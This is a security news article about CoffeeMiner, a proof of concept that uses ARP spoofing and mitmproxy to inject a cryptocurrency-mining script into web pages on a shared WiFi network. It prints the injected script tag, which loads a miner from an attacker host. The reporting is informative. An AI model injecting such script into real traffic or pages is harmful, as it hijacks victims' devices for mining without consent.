Wednesday, February 26, 2025
HomeSecurity NewsCoffeeMiner - Hacking into WiFi Networks to Inject Cryptocurrency Miners

CoffeeMiner – Hacking into WiFi Networks to Inject Cryptocurrency Miners

Published on

SIEM as a Service

Follow Us on Google News

Cryptocurrency Miners are in the raise starting from last year, more than 500 million computers are mining cryptoCurrency in their browsers without the user’s knowledge.

A developer named Arnau published the CoffeeMiner script which intercepts the traffic between the users and the routers to inject scripts into HTML pages.

Arnau published a PoC explaining how a MITM attack performed (Man(Person)-In-The-Middle) to inject some javascript in the HTML pages, to force all the devices connected to a WiFi network to be mining a cryptocurrency for the attacker.

Attack Scenario – CoffeeMiner

CoffeeMiner employees ARPspoofing(used for resolving network layer address (IP) into link layer address (MAC)) for spoofing messages onto a local area network.

Also Read Xerosploit – Toolkit to Perform MITM, Spoofing, DOS, Images Sniffing/Replacement, WD Attacks

The mitmproxy used to analyze the traffic flow and to edit the traffic data. Here he injected a line of code into HTML pages that call the javascript cryptocurrency miner which is deployed in the in the attacker machine.

Injected Code

<script src=”http://httpserverIP:8000/script.js”></script>

Arnau used CoinHive javascript miner, “Coinhive offers a JavaScript miner for the Monero Blockchain that can be embedded into other Websites. The users run the miner directly in their Browser and mine XMR for the site owner in turn for an ad-free experience, in-game currency or whatever incentives they are availing to their users/visitors”.

He set up a Virtual box environment to demonstrate this and also published PoC video.

Now the CoffeeMiner works only with HTTP version and not with HTTPs, Arnau said he will be adding sslstrip to inject with HTTPS sites and autonomous Nmap scan, to add the IPs detected to the CoffeeMiner victim’s list.

The complete source code of CoffeeMiner published in GitHub.

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Silver Fox APT Hackers Target Healthcare Services to Steal Sensitive Data

A sophisticated cyber campaign orchestrated by the Chinese Advanced Persistent Threat (APT) group, Silver...

Ghostwriter Malware Targets Government Organizations with Weaponized XLS File

A new wave of cyberattacks attributed to the Ghostwriter Advanced Persistent Threat (APT) group...

LCRYX Ransomware Attacks Windows Machines by Blocking Registry Editor and Task Manager

The LCRYX ransomware, a malicious VBScript-based threat, has re-emerged in February 2025 after its...

Threat Actors Using Ephemeral Port 60102 for Covert Malware Communications

Recent cybersecurity investigations have uncovered a sophisticated technique employed by threat actors to evade...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Check Point Software to Open First Asia-Pacific R&D Centre in Bengaluru, India

Check Point Software Technologies Ltd. has announced plans to establish its inaugural Asia-Pacific Research...

Threat Actors Trojanize Popular Games to Evade Security and Infect Systems

A sophisticated malware campaign was launched by cybercriminals, targeting users through trojanized versions of...

New FUD Malware Targets MacOS, Evading Antivirus and Security Tools

A new strain of Fully Undetectable (FUD) macOS malware, dubbed "Tiny FUD," has emerged,...